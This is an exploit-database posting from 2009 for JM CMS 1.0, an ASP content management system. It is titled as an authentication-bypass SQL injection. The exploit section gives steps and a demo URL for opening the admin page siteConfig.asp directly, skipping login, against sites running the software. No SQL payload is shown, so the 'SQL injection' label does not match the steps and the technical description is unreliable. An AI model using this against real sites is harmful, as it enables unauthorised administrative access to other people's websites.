JM CMS 1.0 <= 1.0 (Auth Bypass) SQL Injection Vulnerability

2009-12-16T00:00:00
ID 1337DAY-ID-10297
Type zdt
Reporter Red-D3v1L
Modified 2009-12-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
JM CMS 1.0 <= 1.0 (Auth Bypass) SQL Injection Vulnerability
===========================================================

==============================================================================
        [?]  JM CMS 1.0  <== 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================================
    [?] my home:              [ http://sec-r1z.com ]
    [?] Script:               [ JM CMS 1.0 ]
    [?] Language:             [ ASP ]
    [?] Vendor              [http://designsbyjm.net ]
    [?] Founder:              [ ./Red-D3v1L ]
     
########################################################################
  
===[ Exploit SQL Bypass ]===
  
 [»] Go to : [Path]/admin
 
 [»] Add : siteConfig.asp
 
 [»] dem0 :
 
 http://server/admin/siteConfig.asp



#  0day.today [2018-01-10]  #